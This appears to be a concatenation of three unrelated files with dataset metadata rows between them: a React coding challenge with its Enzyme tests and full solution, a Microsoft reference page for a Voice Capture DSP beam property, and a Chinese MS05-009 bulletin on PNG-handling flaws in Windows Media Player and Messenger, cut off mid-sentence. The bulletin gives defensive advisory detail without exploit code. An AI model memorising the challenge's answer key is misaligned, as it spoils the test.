    testString: assert((function() { var shallowRender = Enzyme.shallow(React.createElement(ParentComponent)); return shallowRender.type() === 'div'; })(), 'The React component should return a single <code>div</code> element.');
  - text: The component should return two nested elements.
    testString: assert((function() { var shallowRender = Enzyme.shallow(React.createElement(ParentComponent)); return shallowRender.children().length === 2; })(), 'The component should return two nested elements.');
  - text: The component should return the ChildComponent as its second child.
    testString: assert((function() { const mockedComponent = Enzyme.mount(React.createElement(ParentComponent)); return mockedComponent.find('ParentComponent').find('ChildComponent').length === 1; })(), 'The component should return the ChildComponent as its second child.');
```

</section>

## Challenge Seed
<section id='challengeSeed'>

<div id='jsx-seed'>

```jsx
const ChildComponent = () => {
  return (
    <div>
      <p>I am the child</p>
    </div>
  );
};

class ParentComponent extends React.Component {
  constructor(props) {
    super(props);
  }
  render() {
    return (
      <div>
        <h1>I am the parent</h1>
        { /* change code below this line */ }

        { /* change code above this line */ }
      </div>
    );
  }
};
```

</div>

### After Test
<div id='jsx-teardown'>

```js
ReactDOM.render(<ParentComponent />, document.getElementById('root'))
```

</div>

</section>

## Solution
<section id='solution'>

```js
const ChildComponent = () => {
  return (
    <div>
      <p>I am the child</p>
    </div>
  );
};

class ParentComponent extends React.Component {
  constructor(props) {
    super(props);
  }
  render() {
    return (
      <div>
        <h1>I am the parent</h1>
        { /* change code below this line */ }
        <ChildComponent />
        { /* change code above this line */ }
      </div>
    );
  }
};
```

</section>
388
0.694915
eng_Latn
0.963432
6f55439bc91cc73fa7d879de058f2d56dd478b9e
2,291
md
Markdown
desktop-src/medfound/mfpkey-wmaaecma-featr-micarr-beamproperty.md
npherson/win32
28da414b56bb3e56e128bf7e0db021bad5343d2d
[ "CC-BY-4.0", "MIT" ]
3
2020-04-24T13:02:42.000Z
2021-07-17T15:32:03.000Z
desktop-src/medfound/mfpkey-wmaaecma-featr-micarr-beamproperty.md
npherson/win32
28da414b56bb3e56e128bf7e0db021bad5343d2d
[ "CC-BY-4.0", "MIT" ]
null
null
null
desktop-src/medfound/mfpkey-wmaaecma-featr-micarr-beamproperty.md
npherson/win32
28da414b56bb3e56e128bf7e0db021bad5343d2d
[ "CC-BY-4.0", "MIT" ]
1
2022-03-09T23:50:05.000Z
2022-03-09T23:50:05.000Z
---
Description: Specifies which beam the Voice Capture DSP uses for microphone array processing.
ms.assetid: 9ed761da-3f1b-47e8-b71f-becc56fe8801
title: MFPKEY_WMAAECMA_FEATR_MICARR_BEAM Property
ms.topic: article
ms.date: 05/31/2018
---

# MFPKEY\_WMAAECMA\_FEATR\_MICARR\_BEAM Property

Specifies which beam the Voice Capture DSP uses for microphone array processing.

## Constant for IPropertyBag

Available only by using [**IPropertyStore**](https://msdn.microsoft.com/en-us/library/Bb761474(v=VS.85).aspx).

## Data Type

VT\_I4

## Applies To

- [Voice Capture DSP](voicecapturedmo.md)

## Remarks

Set this property if the value of the [MFPKEY\_WMAAECMA\_FEATR\_MICARR\_MODE](mfpkey-wmaaecma-featr-micarr-modeproperty.md) property is MICARRAY\_EXTERN\_BEAM. If the value of [**MFPKEY\_WMAAECMA\_FEATR\_MICARR\_MODE**](mfpkey-wmaaecma-featr-micarr-modeproperty.md) is MICARRAY\_SINGLE\_BEAM, you can read this property to query which beam was selected by the DSP.

This property can have the following values. Values are in degrees horizontal.

| Value | Description              |
|-------|--------------------------|
| 0     | -50 degrees.             |
| 1     | -40 degrees.             |
| 2     | -30 degrees.             |
| 3     | -20 degrees.             |
| 4     | -10 degrees.             |
| 5     | 0 degrees (center beam). |
| 6     | 10 degrees.              |
| 7     | 20 degrees.              |
| 8     | 30 degrees.              |
| 9     | 40 degrees.              |
| 10    | 50 degrees.              |

## Requirements

| Requirement | Value |
|-------------------------------------|-----------------------------------------------------------------------------------------|
| Minimum supported client<br/> | Windows Vista \[desktop apps only\]<br/> |
| Minimum supported server<br/> | Windows Server 2008 \[desktop apps only\]<br/> |
| Header<br/> | <dl> <dt>Wmcodecdsp.h</dt> </dl> |

## See also

<dl> <dt>

[Media Foundation Properties](media-foundation-properties.md)

</dt> <dt>

[Voice Capture DSP](voicecapturedmo.md)

</dt> </dl>
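Since each beam value *n* in the table maps to an angle of (n × 10 − 50) degrees, the conversion can be sketched in a few lines of Python. This is an illustration only — the `beam_to_degrees` helper is invented here and is not part of the Media Foundation or Voice Capture DSP API:

```python
def beam_to_degrees(beam: int) -> int:
    """Map a MFPKEY_WMAAECMA_FEATR_MICARR_BEAM value (0-10)
    to its horizontal angle in degrees, per the table above."""
    if not 0 <= beam <= 10:
        raise ValueError("beam must be in the range 0-10")
    return beam * 10 - 50

print(beam_to_degrees(0))   # -50
print(beam_to_degrees(5))   # 0 (center beam)
print(beam_to_degrees(10))  # 50
```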
27.939024
204
0.532082
eng_Latn
0.664281
6f558098c8239ac41d5f8492e6ae6acab9422569
35,855
md
Markdown
security-updates/SecurityBulletins/2005/ms05-009.md
MicrosoftDocs/security-updates.zh-tw
a7899f202a462bc504303f28e9c2a8d41cfa99a0
[ "CC-BY-4.0", "MIT" ]
3
2019-01-24T02:18:29.000Z
2020-05-19T20:17:25.000Z
security-updates/SecurityBulletins/2005/ms05-009.md
MicrosoftDocs/security-updates.zh-tw
a7899f202a462bc504303f28e9c2a8d41cfa99a0
[ "CC-BY-4.0", "MIT" ]
257
2017-12-11T09:12:37.000Z
2019-12-06T23:07:01.000Z
security-updates/SecurityBulletins/2005/ms05-009.md
MicrosoftDocs/security-updates.zh-tw
a7899f202a462bc504303f28e9c2a8d41cfa99a0
[ "CC-BY-4.0", "MIT" ]
5
2018-10-12T21:08:18.000Z
2021-11-15T11:25:34.000Z
--- TOCTitle: 'MS05-009' Title: 'Microsoft Security Bulletin MS05-009 - 重大' ms:assetid: 'ms05-009' ms:contentKeyID: 61237388 ms:date: '04/18/2014' ms:mtpsurl: 'https://technet.microsoft.com/zh-TW/library/ms05-009(v=Security.10)' --- Microsoft Security Bulletin MS05-009 - 重大 =========================================== PNG 處理弱點可能會允許遠端執行程式碼 (890261) --------------------------------------------- 發行: 2005年2月8日 | 更新: 2005年7月6日 **發佈日期**:2005 年 2 月 9 日 **版本:**1.0 #### 摘要 **應該閱讀此文件的對象:**使用 Microsoft Windows Media Player、Windows Messenger 和 MSN Messenger 的客戶 **此弱點的影響:**遠端執行程式碼 **最高的嚴重性等級:**重大 **建議:**客戶應立即套用此更新程式 **安全性更新取代資訊:**本公告取代了一個先前發行的安全性更新。 請參閱本公告的<常見問題集>(FAQ) 以取得完整清單。 **警告:無** **已測試軟體及安全性更新下載位置:** **受影響的軟體:** - Microsoft Windows Media Player 9 系列 (在 Windows 2000、Windows XP 及 Windows Server 2003 上使用時) – 下載更新程式 [中文版](https://www.microsoft.com/download/details.aspx?displaylang=zh-tw&familyid=a52279dc-3b6c-4720-8192-45657edbb14f) | [英文版](https://www.microsoft.com/download/details.aspx?familyid=a52279dc-3b6c-4720-8192-45657edbb14f) - Microsoft Windows Messenger 5.0 版 (獨立版本,可安裝於所有支援的作業系統) – 下載更新程式 [中文版](https://www.microsoft.com/download/details.aspx?displaylang=zh-tw&familyid=a8d9eb73-5f8c-4b9a-940f-9157a3b3d774) | [英文版](https://www.microsoft.com/download/details.aspx?familyid=a8d9eb73-5f8c-4b9a-940f-9157a3b3d774) - Microsoft MSN Messenger 6.1 – 下載更新程式 [中文版](https://www.microsoft.com/download/details.aspx?displaylang=zh-tw&familyid=ebe898d8-fe1c-4a5e-993c-5fab3e62c925) | [英文版](https://www.microsoft.com/download/details.aspx?familyid=ebe898d8-fe1c-4a5e-993c-5fab3e62c925) - Microsoft MSN Messenger 6.2 – 下載更新程式 [中文版](https://www.microsoft.com/download/details.aspx?displaylang=zh-tw&familyid=ebe898d8-fe1c-4a5e-993c-5fab3e62c925) | [英文版](https://www.microsoft.com/download/details.aspx?familyid=ebe898d8-fe1c-4a5e-993c-5fab3e62c925) - Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE) 和 Microsoft Windows Millennium Edition (ME) – 請參閱此公告<常見問題集>中有關這些作業系統的詳細資訊。 
**不受影響的軟體:** - Windows Media Player 6.4 - Windows Media Player 7.1 - Windows Media Player for Windows XP (8.0) - Windows XP Service Pack 2 中的 Windows Media Player 9 Series - Windows Media Player 10 **已測試的 Microsoft Windows 元件:** **受影響的元件:** - Microsoft Windows Messenger 4.7.0.2009 版 (在 Windows XP Service Pack 1 上使用時) – 下載更新程式 [中文版](https://www.microsoft.com/download/details.aspx?displaylang=zh-tw&familyid=e3dc209b-ad57-49e1-bb90-6fa2ca8763a6) | [英文版](https://www.microsoft.com/download/details.aspx?familyid=e3dc209b-ad57-49e1-bb90-6fa2ca8763a6&displaylang=en) - Microsoft Windows Messenger 4.7.0.3000 版 (在 Windows XP Service Pack 2 上使用時) – 下載更新程式 [中文版](https://www.microsoft.com/download/details.aspx?displaylang=zh-tw&familyid=1dcc9628-e2d0-496f-b4f2-3afefa0a0156) | [英文版](https://www.microsoft.com/download/details.aspx?familyid=1dcc9628-e2d0-496f-b4f2-3afefa0a0156&displaylang=en) 本清單所列出之軟體版本已經過測試以判斷是否受到影響。 其他版本已不再提供安全性更新支援,或是並不會受到影響。 請造訪 [Microsoft 產品技術支援週期準則網站](https://support.microsoft.com/gp/lifecycle/zh-tw),以瞭解您的產品及版本的支援生命週期。 ### 一般資訊 提要 ---- **提要:** 這個更新程式能解決一項新發現的公開弱點。 PNG 影像格式的處理程序中存在遠端執行程式碼的弱點。 本公告的<弱點詳細資訊>部分會提供這項弱點的相關資訊。 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 攻擊者接下來將能安裝程式,檢視、變更或刪除資料,或建立具有完整使用者權限的新帳戶。 **嚴重性等級和弱點識別碼:** <p> </p> <table style="border:1px solid black;"> <thead> <tr class="header"> <th style="border:1px solid black;" >弱點識別碼</th> <th style="border:1px solid black;" >弱點的影響</th> <th style="border:1px solid black;" >Windows Media Player 9 系列 CAN-2004-1244</th> <th style="border:1px solid black;" >Windows Messenger (所有版本) CAN-2004-0597</th> <th style="border:1px solid black;" >MSN Messenger 6.1 及 6.2 CAN-2004-0597</th> </tr> </thead> <tbody> <tr class="odd"> <td style="border:1px solid black;">PNG 處理弱點 - <a href="https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-1244">CAN-2004-1244</a></td> <td style="border:1px solid black;">遠端執行程式碼</td> <td style="border:1px solid black;">重大<br /> </td> <td style="border:1px solid black;">無</td> <td style="border:1px 
solid black;">無</td> </tr> <tr class="even"> <td style="border:1px solid black;">PNG 處理弱點 - <a href="https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0597">CAN-2004-0597</a></td> <td style="border:1px solid black;">遠端執行程式碼<br /> </td> <td style="border:1px solid black;">無</td> <td style="border:1px solid black;">中度</td> <td style="border:1px solid black;">重大<br /> </td> </tr> <tr class="odd"> <td style="border:1px solid black;"><strong>所有弱點的彙總嚴重性</strong></td> <td style="border:1px solid black;"></td> <td style="border:1px solid black;"><strong>重大</strong></td> <td style="border:1px solid black;"><strong>中度</strong><br /> </td> <td style="border:1px solid black;"><strong>重大</strong><br /> </td> </tr> </tbody> </table> 此項[評估](https://technet.microsoft.com/security/bulletin/rating)的根據包括:受弱點影響的系統類型、系統的一般部署模式,以及弱點遭利用後對系統所造成的影響。 與本安全性更新相關的常見問題集 (FAQ) ------------------------------------ **這次發行的更新程式取代了哪些更新?** 本安全性更新僅取代了一個先前發行的 Windows Media Player 安全性公告。 下表列出受影響的安全性公告編號及相關的版本。 | 公告編號 | Windows Media Player 9 系列 | |--------------|-----------------------------| | **MS03-021** | 取代 | **Windows 98、Windows 98 Second Edition 和 Windows Millennium Edition 的延伸支援服務,對於針對這些作業系統發行的安全性更新有什麼影響?** Microsoft 只針對重大安全性問題發行安全性更新。 在這段支援服務期間,不會對非重大安全性的問題提供安全性更新。 如想瞭解這些作業系統的 Microsoft 技術支援週期準則,請造訪這個[網站](https://go.microsoft.com/fwlink/?linkid=33327)。 如需更多有關嚴重性等級的資訊,請造訪這個[網站](https://technet.microsoft.com/security/bulletin/rating) **注意:**本安全性公告中有這些平台的重大安全性更新,並可從 [Windows Update 網站](https://go.microsoft.com/fwlink/?linkid=21130)下載。 **本安全性公告所提到的弱點,是否會對 Windows 98、Windows 98 Second Edition 或 Windows Millennium Edition 帶來重大的影響?** 是。 這項弱點會對 Windows 98、Windows 98 Second Edition 或 Windows Millennium Edition 帶來重大的影響。 本安全性公告中有這些平台的重大安全性更新,並可從 [Windows Update 網站](https://go.microsoft.com/fwlink/?linkid=21130)下載。 如需更多有關嚴重性等級的資訊,請造訪這個[網站](https://technet.microsoft.com/security/bulletin/rating) **如何可取得 MSN Messenger 更新程式?** MSN Messenger 更新程式可透過本公告<受影響的軟體>部份中的下載連結取得。 此外,本更新程式發行後不久,登入 MSN 
Messenger 的客戶將可收到更新版本的 MSN Messenger。 **為何 Windows Messenger 5.0 更新程式升級至 5.1 版,而非 5.0 更新程式?** 由於 Windows Messenger 5.0 的基礎結構因素,無法提供遞增補充程式。 Windows Messenger 5.0 的修正程式一律需要部署完全更新的 Windows Messenger 套件,因此推出 Windows Messenger 5.1 套件。 根據客戶回報結果,已決定遞增版本號碼,便於識別所部署的版本。 **此一新版 Windows Messenger 包含哪些功能的變更?** 除本公告相關安全性修正程式之外,Windows Messenger 5.1 並包含對於 Windows Messenger 5.0 的其他錯誤修正程式。 完整詳細資訊請參閱 Windows Messenger 5.1 下載網頁。 **是否可以使用 Microsoft Baseline Security Analyzer (MBSA) 來判斷是否需要此更新?** MBSA 會判斷 Windows Media Player 是否需要此更新。 MBSA 不會判斷 Windows Messenger 或 MSN Messenger 是否需要此更新, 而會針對此事項提供注意訊息。 如需關於 MBSA 中注意訊息的詳細資訊,請參閱 [Microsoft 知識庫文件編號 306460](https://support.microsoft.com/kb/306460)。 Microsoft 已發佈「企業更新掃描工具 (EST)」,協助客戶偵測 MBSA 目前尚未支援的必要安全性更新程式。 如需有關 MBSA 目前無法偵測的程式詳細資訊,請參閱 [Microsoft 知識庫文件編號 306460](https://support.microsoft.com/kb/306460) **什麼是企業更新掃描工具 (EST)?** 對於「重要」及「重大」公告等級弱點的綜合更新,我們會持續提供偵測工具,因此可能會在某些公告提供獨立的工具。 Microsoft 會評估各公告於偵測與部署的複雜性,根據每次發行的細節提供偵測上的支援。 當特定公告提供偵測工具時,客戶可以使用命令列介面執行工具。 接著客戶可以使用 XML 輸出檔案處理結果。 Microsoft 將會隨工具提供詳細的說明文件,以確保客戶能順利使用。 **是否可以使用企業更新掃描工具 (EST) 的版本來判斷是否需要此更新程式?** 是。 Microsoft 已建立新版 EST,可判斷您是否需要套用此更新。 此工具可以從 [Microsoft 下載中新](https://go.microsoft.com/fwlink/?linkid=41947)取得。 此工具另有 SMS 客戶可從 [SMS 網站](https://www.microsoft.com/taiwan/smserver/default.htm)取得的版本。 **是否可以使用 Systems Management Server (SMS) 來判斷是否需要此更新?** 是。 SMS 能協助偵測及部署本安全性更新。 SMS 使用 MBSA 來進行偵測,因此 SMS 也會面臨與 MBSA 相同的限制,而無法偵測部份程式;請參閱本公告先前所述說明。 如需關於 SMS 的詳細資訊,請造訪 [SMS 網站](https://www.microsoft.com/taiwan/smserver/default.htm)。 要偵測 Microsoft Windows 及其他受影響的 Microsoft 產品,需要使用安全性更新盤點工具 (Security Update Inventory Tool)。 如需更多有關安全性更新盤點工具限制的資訊,請參閱 [Microsoft 知識庫文件編號 306460](https://support.microsoft.com/kb/306460)。 弱點詳細資料 ------------ #### Windows Media Player 的 PNG 處理弱點 - CAN-2004-1244: Windows Media Player 處理寬度或高度值過高的 PNG 檔案的方式有誤,因此存在遠端執行程式碼的弱點。 攻擊者可能會製作惡意的 PNG,在使用者造訪惡意網站或按一下惡意電子郵件中的連結後,允許從遠端執行程式碼,以利用這個弱點。 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 #### Windows Media Player 的 PNG 處理弱點 - CAN-2004-1244 的緩和因素: - 
在網頁式攻擊的案例中,攻擊者必須架設網站,並在其中包含透過惡意 PNG 檔案利用此弱點的網頁。 攻擊者也可危及網站,使該網站顯示含有惡意內容的網頁。 攻擊者並不能強制使用者造訪網站, 而是引誘他們自行前往。一般的做法是設法讓使用者按一下通往攻擊者網站或攻擊者所危及網站的連結。 - 成功利用此弱點的攻擊者可以取得與本機使用者相同的使用者權限。 系統上帳戶使用者權限較低的使用者,其受影響的程度比擁有系統管理權限的使用者要小。 #### Windows Media Player 的 PNG 處理弱點 - CAN-2004-1244 的因應措施: Microsoft 已經測試過以下的因應措施。 這些因應措施並不能徹底解決弱點,但是有助於封鎖已知的攻擊行為。 如果因應措施會降低功能,以下將會描述功能降低的情況。 針對此項弱點,Microsoft 已發現數種不同的攻擊模式。 每種攻擊模式有不同的因應措施。 - **靜態 WMP 副檔名攻擊的因應措施** **解除 WMP 副檔名關聯。** 在 Windows 中解除下列副檔名的關聯,以避免預覽或開啟指向格式不正確 PNG 檔的檔案:.ASX、.WAX、.WVX、.WPL、.WMX、.WMS、.WMZ。 手動步驟 - Windows Media Player 法: - 啟動 Windows 檔案總管 - 在 \[工具\] 功能表中,選擇 \[資料夾選項\] - 選擇 \[檔案類型\] 索引標籤 - 上下捲動到 .ASX 副檔名,然後按 \[刪除\] 按鈕 - 為前面列出的每一種副檔名重複第 4 步。 此外,企業客戶也可使用 [Microsoft 知識庫文件編號 837388](https://support.microsoft.com/?id=837388) 中記載的步驟,設定 Outlook 以封鎖列出的危險檔案。 請依照其中的指示,新增記載的副檔名到階層 1 封鎖清單中。 家庭使用者可進行 [Microsoft 知識庫文件編號 291387](https://support.microsoft.com/?id=291387) 中記載的步驟,設定 Outlook Express 以封鎖列出的危險檔案。 可使用此資訊在 Windows \[檔案類型\] 對話方塊中,將每個副檔名設定為 \[下載之後進行開啟確認\]。 **因應措施的影響:**刪除與 Media Player 的檔案關聯很可能導致使用 Windows Media Server/Player 播放網路廣播與訓練課程等的企業使用者無法正常作業。 想要觀賞各網站串流內容的家庭使用者執行此因應措施後也可能受影響。 - **WMP ActiveX 攻擊的 Internet Explorer 因應措施** **停用 Windows Media Player ActiveX 控制項**。 為防止遭受網頁內的攻擊,請依照下列步驟停用 Windows Media Player ActiveX 控制項: 請依照 [Microsoft 知識庫文件編號 240797](https://support.microsoft.com/default.aspx?scid=kb;en-us;q240797) 中的指示,刪除 Internet Explorer 中的下列 CLSID 位元: ``` CLSID:{6BF52A52-394A-11D3-B153-00C04F79FAA6}PROGID:WMPlayer.OCX.7 CLSID:{22D6F312-B0F6-11D0-94AB-0080C74C7E95}PROGID:MediaPlayer.MediaPlayer.1 CLSID:{05589FA1-C356-11CE-BF01-00AA0055595A}PROGID:AMOVIE.ActiveMovieControl.2 ``` **因應措施的影響:** 如果您停用 Windows Media Player ActiveX 控制項,使用此控制項的網頁便不再依設計方式作用。 如此會使內容無法透過此控制項播放,包括音訊和視訊在內。 - **Content-Type HTTP 標題攻擊** 由於 MIME 類型項目都有可能被濫用來利用此弱點,因此預防這個攻擊的唯一方法就是在登錄中移除所有可能的 MIME 類型項目;這類登錄項目會為 Windows Media Player 與列在伺服器傳回的 Content-Type 標頭中的 MIME 類型建立關聯。 下面是與 WMP CLSID 相關聯的 MIME 類型清單。 ``` HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/vnd.ms-wpl 
HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-mplayer2 HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-ms-wmd HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-ms-wmz HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/aiff HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/basic HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mid HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/midi HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mp3 HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mpeg HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mpegurl HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/mpg HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/wav HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-aiff HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mid HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-midi HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mp3 HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mpeg HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mpegurl HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-mpg HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-ms-wax HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-ms-wma HKEY_CLASSES_ROOT\MIME\Database\Content Type\audio/x-wav HKEY_CLASSES_ROOT\MIME\Database\Content Type\midi/mid HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/avi HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/mpeg HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/mpg HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/msvideo HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ivf HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-mpeg HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-mpeg2a HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-asf HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-asf-plugin HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-msvideo HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wm 
HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wmp HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wmv HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wmx HKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wvx ``` **因應措施的影響:** - 這些 MIME 類型登錄機碼都含有一個 CLSID 值,指向下列 CLISD: HKEY\_CLASSES\_ROOT\\CLSID\\{CD3AFA8F-B84F-48F0-9393-7EDC34128127}\\InprocServer32 這個 CLISD 與 WMP.DLL 相關聯,WMP.DLL 負責在使用這些 MIME 類型時啟動 Windows Media Player。 取消 WMP.DLL 登錄會導致 Windows Media Player 作業中斷。 - 這項因應措施列出的 MIME 類型僅適用 Windows XP。 其他平台可能尚有其他可用的 MIME 類型。 如需更多關於 Windows Media Player 副檔名的資訊,請參閱這個 [MSDN 網站](https://msdn.microsoft.com/library/default.asp?url=/library/en-us/wmplay10/mmp_sdk/filenameextensions.asp) (英文)。 #### Windows Media Player 的 PNG 處理弱點 - CAN-2004-1244 的常見問題集: **這個弱點的範圍為何?** 這是遠端執行程式碼的弱點。 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 **造成這個弱點的原因為何?** Windows Media Player 無法充分驗證寬度或高度值過高的 PNG 影像格式。 **什麼是 PNG?** PNG 是 Portable Network Graphics (可攜式網路圖形) 的縮寫。 可攜式網路圖形 (PNG) 格式是為了取代舊有較簡單的 GIF 格式所設計,也有部分是為了取代更為複雜的 TIFF 格式。 如需更多關於 PNG 的資訊,請參閱這個[網站](https://www.libpng.org/pub/png/pngintro.html) (英文)。 **攻擊者可能會利用這項弱點採取什麼行動?** 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 **什麼人可以利用此弱點?** 任何匿名使用者只要能在網站、網路共用區中提供格式錯誤的 PNG 檔案,或說服使用者開啟以電子郵件附件傳送的 PNG 檔案,便可能利用這項弱點。 **攻擊者如何利用這項弱點?** 攻擊者可以在網站或網路共用區中提供蓄意製作的 PNG 檔案,再引誘使用者造訪網站,進而利用這項弱點。 此外,攻擊者可在電子郵件中傳送惡意 PNG 檔案的連結,並且引誘使用者按一下連結。 **因為這個弱點而承受風險的主要系統有哪些?** 工作站和終端機伺服器的風險最高。 如果系統管理憑證不足的使用者被授予登入伺服器並執行程式的能力時,伺服器會面臨更大的風險。 然而,最佳實務強烈建議您制止這種行為。 **這項弱點是否會對 Windows 98、Windows 98 Second Edition 或 Windows Millennium Edition 帶來重大的影響?** 這項弱點不會對 Windows 98 帶來重大的影響,然而 Windows 98 Second Edition 及 Windows Millennium Edition 則會受到影響。 本安全性公告中有這些平台的重大安全性更新,並可從 [Windows Update 網站](https://go.microsoft.com/fwlink/?linkid=21130)下載。 如需更多有關嚴重性等級的資訊,請造訪這個[網站](https://technet.microsoft.com/security/bulletin/rating) **更新的作用何在?** 更新程式會修改 Windows Media Player 驗證 PNG 檔案寬度和高度的方式,進而解除此項弱點。 **當安全性公告發行時,這項弱點是否已揭發出來?** 與此類似的弱點已揭發出來,並被歸類為「一般性弱點」,揭示編號為 
[CAN-2004-0597](https://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0597)。 **這項弱點是否與**[CAN-2004-0597](https://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0597) **所描述的弱點相同?** 雖然與這裡描述的弱點相似,但是 Windows Media Player 並沒有使用或加入受影響的 libpng 程式庫。 不過,Windows Media Player 因設定方式之故,還是會受到這裡描述的弱點影響。 **當本安全性公告發行時,Microsoft 是否已接獲任何消息,指出這項弱點已遭有心人士惡用?** 否。 當本安全性公告初次發行時,Microsoft 並未接到任何有關本弱點已成為公開攻擊媒介的消息,也沒有發現任何以此概念發展的程式碼公開範例。 #### Windows Messenger 的 PNG 處理弱點 - CAN-2004-0597: 由於 Windows Messenger 處理損毀或格式不正確的 PNG 方式有問題,導致其中存在遠端執行程式碼的弱點。 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 #### Windows Messenger 的 PNG 處理弱點 - CAN-2004-0597 的緩和因素: - Windows Messenger 中弱點的性質與 MSN Messenger 或 Windows Media Player 中的不同。 若要利用 Windows Messenger 中的弱點,方法可能非常複雜,需要對組織內部網路投入大量心力、並且具備深厚知識,方能嘗試利用這項弱點。 - 使用者必須正在執行 Windows Messenger,並設定要接收 .NET Alerts。 #### Windows Messenger 的 PNG 處理弱點 - CAN-2004-0597 的因應措施: Microsoft 已經測試過以下的因應措施。 這些因應措施並不能徹底解決弱點,但是有助於封鎖已知的攻擊行為。 如果因應措施會降低功能,以下將會描述功能降低的情況。 **關閉 Windows Messenger 的 .NET Alerts 功能。** - 開啟 Windows Messenger - 移至 \[工具\] 功能表,選擇 \[選項\] - 在 \[選項\] 對話方塊中,移至 \[隱私\] 索引標籤。 - 核取說明 \[不要下載任何索引標籤到我的電腦\] 的選項 **注意:**這項設定會在您下回登入 Windows Messenger 起生效。 只有註冊願意接收的 Passport 帳戶才能使用 .Net Alerts。 未曾設定帳戶以接收這些通知的使用者無法使用這項設定。 #### Windows Messenger 的 PNG 處理弱點 - CAN-2004-0597 的常見問題集: **這個弱點的範圍為何?** 這是遠端執行程式碼的弱點。 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 **造成這個弱點的原因為何?** Windows Messenger 使用公開的 libpng 1.2.5 版程式庫,這個程式庫近期被發現有數項已知弱點。 **什麼是 PNG?** PNG 是 Portable Network Graphics (可攜式網路圖形) 的縮寫。 可攜式網路圖形 (PNG) 格式是為了取代舊有較簡單的 GIF 格式所設計,也有部分是為了取代更為複雜的 TIFF 格式。 如需更多關於 PNG 的資訊,請參閱這個[網站](https://www.libpng.org/pub/png/pngintro.html) (英文)。 **攻擊者可能會利用這項弱點採取什麼行動?** 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。 **什麼人可以利用此弱點?** 若要利用 Windows Messenger 中的弱點,方法可能非常複雜,需要對組織內部網路投入大量心力、並且具備深厚知識,方能嘗試利用這項弱點。 攻擊者除非能夠偽造 .NET Messenger 服務,否則就必須攔截並重寫用戶端與伺服器間的通訊。 僅是將格式不正確的 PNG 影像檔傳送至 Windows Messenger 並不能利用此弱點。 **因為這個弱點而承受風險的主要系統有哪些?** 工作站和終端機伺服器的風險最高。 如果系統管理憑證不足的使用者被授予登入伺服器並執行程式的能力時,伺服器會面臨更大的風險。 然而,最佳實務強烈建議您制止這種行為。 **這項弱點是否會對 Windows 98、Windows 98 Second 
Edition 或 Windows Millennium Edition 帶來重大的影響?** 否。 這些弱點都不會對 Windows 98、Windows 98 Second Edition,或 Windows Millennium Edition 造成任何重大的影響。 如需更多有關嚴重性等級的資訊,請造訪這個[網站](https://technet.microsoft.com/security/bulletin/rating) **是否可以透過網際網路利用這個弱點?** 否。 攻擊者除非能夠偽造 .NET Messenger 服務,否則就必須攔截並重寫用戶端與伺服器間的通訊。 僅是將格式不正確的 PNG 傳送至 Windows Messenger 並不能利用此弱點。 Microsoft 已經針對這個問題提出如何保護電腦的因應措施。 一般使用者可以造訪[保護您的電腦網站](https://go.microsoft.com/fwlink/?linkid=21169)。 IT 專業人員可以造訪[資訊安全指導中心網站](https://go.microsoft.com/fwlink/?linkid=21171)。 **更新的作用何在?** 本更新解決這項弱點的方式是將 Windows Messenger 所使用的程式庫更新,使其能充分驗證所處理的 PNG 影像檔案。 此外也可使得 Windows Messenger 能夠驗證 PNG 影像檔案格式是否正確。 **當安全性公告發行時,這項弱點是否已揭發出來?** 這些弱點已揭發出來,並被歸類為「一般性弱點」,揭示編號為 [CAN-2004-0597](https://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0597)、[CAN-2004-0598](https://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0598) 和 [CAN-2004-0599](https://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0599)。 **當本安全性公告發行時,Microsoft 